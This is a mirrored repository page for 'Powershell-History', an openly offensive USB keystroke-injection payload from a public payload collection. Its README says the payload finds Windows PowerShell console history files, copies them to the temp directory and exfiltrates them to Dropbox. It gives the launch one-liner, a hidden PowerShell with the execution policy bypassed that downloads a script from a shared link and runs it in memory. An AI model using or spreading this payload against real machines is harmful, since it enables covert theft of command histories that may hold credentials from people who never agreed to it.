mirror of https://github.com/hak5/omg-payloads.git
565a11451a | ||
---|---|---|
.. | ||
PH.ps1 | ||
README.md | ||
payload.txt |
README.md
Table of Contents
Powershell-History
A payload to exfiltrate the history of the powershell console
Description
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
Getting Started
Dependencies
- DropBox or other file sharing service - Your Shared link for the intended file
- Windows 10
Executing program
- Plug in your device
- Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
Version History
- 0.1
- Initial Release